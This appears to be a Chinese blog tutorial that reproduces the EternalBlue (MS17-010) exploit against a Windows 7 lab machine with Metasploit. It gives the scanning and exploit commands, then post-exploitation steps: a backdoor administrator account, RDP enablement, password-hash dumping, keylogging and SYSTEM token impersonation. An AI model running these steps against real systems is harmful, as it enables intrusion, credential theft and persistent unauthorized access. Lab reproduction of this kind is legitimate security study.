Win7经典漏洞永恒之蓝复现
Win7经典漏洞永恒之蓝复现
- 环境
- 信息收集
- 确定漏洞
- 渗透
- 渗透成功后一些常用操作
环境
工具:metaspoilt
模拟攻击机ip:192.168.2.19
靶机ip:192.168.2.22
信息收集
扫描靶机端口及端口服务版本
nmap -sV 192.168.2.22
445端口开启且版本信息已经显示时windows7版本,永恒之蓝漏洞特征已非常明显
确定漏洞
启动metaspoilt
搜索ms17-010
search ms17-010
exploit/windows/smb/ms17_010_eternalblue 为攻击模块
auxiliary/scanner/smb/smb_ms17_010 为辅助模块可以扫描目标是否存在永恒之蓝漏洞
进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
查看参数
show options
![在这里插入
RHOSTS参数是必填项,参数为目标ip
set RHOSTS 192.168.2.22
运行
exploit
运行结果
确定有永恒之蓝漏洞
渗透
使用ms17-010攻击模块
use exploit/windows/smb/ms17_010_eternalblue
查看参数
show options
主要参数有
RHOSTS:目标主机ip
LHOST:攻击者ip (程序检测到网卡的ip已自动填写)
LPORT:攻击接收端口(默认为4444,可根据需要更改)
set RHOSTS 192.168.2.22
开始渗透
exploit
渗透成功
渗透成功后一些常用操作
通过Shell对靶机Win7进行控制
创建用户名密码
net user hack 123456 /add
将用户hack添加入管理组
net localgroup administrators hack /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.2.22
shell交互显示乱码是因为编码不同
chcp 65001
修改编码可解决
获取到session后的常用命令:
help #获取所有可用命令
getuid #获取当前权限
screenshot #截屏
hashdump #获取密码的hash
ps #获取进程列表
sysinfo #获取系统信息
route #获取路由表
getpid #获取当前攻入的进程pid
migrate #将当前后门注入迁移到其他程序
keyscan_start # 开启键盘记录
keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe
download/upload #上传下载文件
keyscan_stop # 监视键盘记录
bg # 回到metasploit界面
令牌操纵
use incognito #heip incognito 查看帮助
list_tokens -u 查看可用的token
impersonate_token “伪造的身份” #假冒token 或者
举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用
execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell
Win7经典漏洞永恒之蓝复现相关推荐
- 利用虚拟机复现漏洞 “永恒之蓝”
利用虚拟机复现漏洞"永恒之蓝" 攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程. -- -- &quo ...
- Metasploit渗透框架介绍及永恒之蓝复现
Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...
- 网络安全-MS17-010漏洞-永恒之蓝
网络安全-MS17-010漏洞-永恒之蓝 这个东西怎么说呢,无论是干网络的没干网络的,估计每个人都听说过这个叫做永恒之蓝的东西 这个东东当时可谓是红极一时,现在也有点热度 这个漏洞呢,在win10是不 ...
- win7系统smb永恒之蓝【漏洞复现】
介绍 永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers ...
- linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...
- MS17-010 漏洞永恒之蓝445漏洞复现
前言 这里使用kali中的Metasploit 主要利用445端口的漏洞 首先需要一台win7作为目标靶机 (不只是win7可以) 启用Metasploit mfsconsole 1.查找漏洞模块 s ...
- 经典利用永恒之蓝漏洞对Windows操作系统进行攻击
利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...
- MSF-17010(永恒之蓝)复现
最近开始学习渗透,永恒之蓝漏洞很出名对此学习记录并且复现 所需环境VMware,两台主机使用NAT模式连接 kali 192.168.249.129 windows7 192.168.249.130 ...
- 服务器漏洞--永恒之蓝
漏洞问题的简单分析 前言:不扫不知道,一扫吓一跳,原来服务器存在这么多安全隐患:看到这些,可谓祖国江山一片红,下面是解决思路和方式 图中可以发现三类漏洞,服务漏洞,数据库漏洞,服务器本身漏洞. 1.服 ...
最新文章
- vscode 终端 进入node_安装了Node.js 从VScode 使用node -v 和 npm -v等命令却无效
- excel排名_WPS-Excel表格实用技巧——排位排名函数(RANK函数)的使用
- jsonwebtoken中文文档
- Angular 如何根据一个 class 的定义和数据,动态创建一个该类的实例
- 二叉树的相关题(叶子结点个数,最大深度,找特殊值结点(值不重复),判断两个树是否相同,判断两个数是否为镜像树,是否为子树,)
- php表格tr,jQuery+ajax实现动态添加表格tr td功能示例
- [css] 举例说明BFC会与float元素相互覆盖吗?为什么?
- 使用Sublime Text 3做Python开发
- AI产品,如何做好从零到一
- 微信公众开放平台开发04---百度BAE,java应用部署服务器,jetty了解
- 【C++ 与 STL】映射:map
- c md5加密 和java不一样_C#的MD5加密为什么和JAVA的加密出来的结果不一样?
- 帮你躲坑:pip install tensorflow 报错怎么办,import tensorflow 报错怎么办?
- [PHP开发必备] -- 小巧强悍的MYSQL-Front中文版使用教程,附最新版下载地址
- python+selenium常见坑
- window10华硕计算机主板VT,华硕电脑主板开启VT虚拟化方法详解
- 郭天祥的10天学会51单片机_第十一节
- Python图像处理丨认识图像锐化和边缘提取的4个算子
- laypage分页java例子_总结laypage.js分页插件用法
- 苹果vpn是下一件大事
热门文章
- 怎么获取商品sku信息api接口
- html下拉框onchange事件,JQuery动态修改select标签的内容,并绑定onchange事件,弹出选择的值...
- html博客图文设计,设计基本功!帮你掌握图文排版的5个小技巧—UI博客精选
- 点滴力量 共创美好生活
- 江苏省工业互联网标识创新应用案例集
- eclipse启动Tomcat服务器
- 泗阳中学2021高考成绩查询,江苏泗阳中学2021年排名
- elementui-Tabs 标签页固定高度内容超出高度可滚动
- miui相机位置服务器,[盘点MIUI的那些神功能] 开启“MIUI相机”实验室功能
- Android AOSP LatinIME输入法自定义图片按钮